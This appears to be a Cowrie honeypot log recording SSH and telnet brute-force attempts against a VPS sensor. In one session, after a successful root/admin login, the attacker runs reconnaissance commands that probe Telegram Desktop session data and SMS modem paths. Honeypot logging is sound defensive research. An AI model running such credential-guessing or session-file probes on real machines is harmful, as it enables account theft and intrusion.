{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:02.907407Z","src_ip":"212.227.125.160","session":"2b0e2f4a1db1"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:02.908660Z","src_ip":"212.227.125.160","session":"2b0e2f4a1db1"}
{"eventid":"cowrie.session.closed","duration":0.16838431358337402,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:03.073110Z","src_ip":"212.227.125.160","session":"2b0e2f4a1db1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3538,"dst_ip":"1.2.3.4","dst_port":23,"session":"907eb5d5059d","protocol":"telnet","message":"New connection: 212.227.125.160:3538 (1.2.3.4:23) [session: 907eb5d5059d]","sensor":"my-vps","timestamp":"2025-09-09T07:23:03.234812Z"}
{"eventid":"cowrie.session.closed","duration":0.0014178752899169922,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:03.236143Z","src_ip":"212.227.125.160","session":"907eb5d5059d"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:14.408739Z","src_ip":"212.227.235.229","session":"17d1cfcfde3f"}
{"eventid":"cowrie.session.closed","duration":31.335355520248413,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:16.334172Z","src_ip":"212.227.235.229","session":"f1c6ee214682"}
{"eventid":"cowrie.session.closed","duration":31.99153232574463,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:20.992707Z","src_ip":"212.227.125.160","session":"bd4f4a54af60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32974,"dst_ip":"1.2.3.4","dst_port":23,"session":"857bd7cb13bf","protocol":"telnet","message":"New connection: 212.227.235.229:32974 (1.2.3.4:23) [session: 857bd7cb13bf]","sensor":"my-vps","timestamp":"2025-09-09T07:23:35.796646Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:35.798337Z","src_ip":"212.227.235.229","session":"857bd7cb13bf"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:35.799147Z","src_ip":"212.227.235.229","session":"857bd7cb13bf"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:35.800002Z","src_ip":"212.227.235.229","session":"857bd7cb13bf"}
{"eventid":"cowrie.session.closed","duration":0.16112184524536133,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:35.957701Z","src_ip":"212.227.235.229","session":"857bd7cb13bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32978,"dst_ip":"1.2.3.4","dst_port":23,"session":"46dcee4ab83e","protocol":"telnet","message":"New connection: 212.227.235.229:32978 (1.2.3.4:23) [session: 46dcee4ab83e]","sensor":"my-vps","timestamp":"2025-09-09T07:23:36.113128Z"}
{"eventid":"cowrie.session.closed","duration":0.0012340545654296875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:23:36.114287Z","src_ip":"212.227.235.229","session":"46dcee4ab83e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":33952,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdfe85ac0056","protocol":"ssh","message":"New connection: 92.118.39.62:33952 (1.2.3.4:22) [session: fdfe85ac0056]","sensor":"my-vps","timestamp":"2025-09-09T07:24:24.533473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:24:24.534655Z","src_ip":"92.118.39.62","session":"fdfe85ac0056"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:24:24.564621Z","src_ip":"92.118.39.62","session":"fdfe85ac0056"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-09-09T07:24:24.656445Z","src_ip":"92.118.39.62","session":"fdfe85ac0056"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:24:25.688783Z","src_ip":"92.118.39.62","session":"fdfe85ac0056"}
{"eventid":"cowrie.session.connect","src_ip":"112.184.16.238","src_port":54144,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea7840101187","protocol":"ssh","message":"New connection: 112.184.16.238:54144 (1.2.3.4:22) [session: ea7840101187]","sensor":"my-vps","timestamp":"2025-09-09T07:26:06.093579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-09T07:26:06.094620Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-09T07:26:06.407780Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T07:26:08.939093Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:26:10.244359Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:10.896610Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-09T07:26:10.897331Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-09T07:26:10.897900Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:11.203295Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:11.879576Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-09T07:26:11.880401Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:12.185824Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:12.812783Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T07:26:12.813492Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:13.118172Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:13.841322Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-09T07:26:13.842022Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:14.150825Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:14.776250Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-09T07:26:14.776924Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:15.091164Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:15.796259Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-09T07:26:15.796992Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:16.101256Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:16.784038Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-09-09T07:26:16.784623Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:17.091538Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:17.716597Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-09-09T07:26:17.717391Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:18.052851Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:26:18.716324Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-09-09T07:26:18.717036Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:19.021082Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.closed","duration":"51.4","message":"Connection lost after 51.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:26:57.465608Z","src_ip":"112.184.16.238","session":"ea7840101187"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ec22a3242c8","protocol":"ssh","message":"New connection: 212.227.125.160:46482 (1.2.3.4:22) [session: 5ec22a3242c8]","sensor":"my-vps","timestamp":"2025-09-09T07:27:21.768793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:27:21.769698Z","src_ip":"212.227.125.160","session":"5ec22a3242c8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:27:21.965368Z","src_ip":"212.227.125.160","session":"5ec22a3242c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41150,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab8e2017a4d3","protocol":"ssh","message":"New connection: 212.227.235.229:41150 (1.2.3.4:22) [session: ab8e2017a4d3]","sensor":"my-vps","timestamp":"2025-09-09T07:27:38.880858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:27:40.292064Z","src_ip":"212.227.235.229","session":"ab8e2017a4d3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:27:40.292719Z","src_ip":"212.227.235.229","session":"ab8e2017a4d3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61170,"dst_ip":"1.2.3.4","dst_port":22,"session":"1299cf33859a","protocol":"ssh","message":"New connection: 217.72.205.35:61170 (1.2.3.4:22) [session: 1299cf33859a]","sensor":"my-vps","timestamp":"2025-09-09T07:28:26.512232Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:28:26.513299Z","src_ip":"217.72.205.35","session":"1299cf33859a"}
{"eventid":"cowrie.session.closed","duration":"120.1","message":"Connection lost after 120.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:29:21.826133Z","src_ip":"212.227.125.160","session":"5ec22a3242c8"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:29:38.899643Z","src_ip":"212.227.235.229","session":"ab8e2017a4d3"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":42846,"dst_ip":"1.2.3.4","dst_port":22,"session":"2669fb110ee7","protocol":"ssh","message":"New connection: 92.118.39.62:42846 (1.2.3.4:22) [session: 2669fb110ee7]","sensor":"my-vps","timestamp":"2025-09-09T07:30:47.241435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:30:47.242410Z","src_ip":"92.118.39.62","session":"2669fb110ee7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:30:47.272184Z","src_ip":"92.118.39.62","session":"2669fb110ee7"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-09-09T07:30:47.363271Z","src_ip":"92.118.39.62","session":"2669fb110ee7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:30:48.395303Z","src_ip":"92.118.39.62","session":"2669fb110ee7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59268,"dst_ip":"1.2.3.4","dst_port":22,"session":"906d593240da","protocol":"ssh","message":"New connection: 217.72.205.35:59268 (1.2.3.4:22) [session: 906d593240da]","sensor":"my-vps","timestamp":"2025-09-09T07:34:58.582182Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:34:58.583332Z","src_ip":"217.72.205.35","session":"906d593240da"}
{"eventid":"cowrie.session.connect","src_ip":"123.20.153.250","src_port":60830,"dst_ip":"1.2.3.4","dst_port":23,"session":"f6b760825e9f","protocol":"telnet","message":"New connection: 123.20.153.250:60830 (1.2.3.4:23) [session: f6b760825e9f]","sensor":"my-vps","timestamp":"2025-09-09T07:35:02.108612Z"}
{"eventid":"cowrie.session.closed","duration":30.51873517036438,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:35:32.627267Z","src_ip":"123.20.153.250","session":"f6b760825e9f"}
